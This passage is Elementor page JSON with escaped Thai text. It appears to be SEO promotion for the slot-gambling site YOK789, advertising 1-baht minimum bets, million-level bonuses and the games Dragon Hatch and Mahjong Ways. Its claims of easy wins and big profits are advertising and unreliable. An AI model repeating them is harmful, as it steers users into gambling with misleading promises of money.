\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 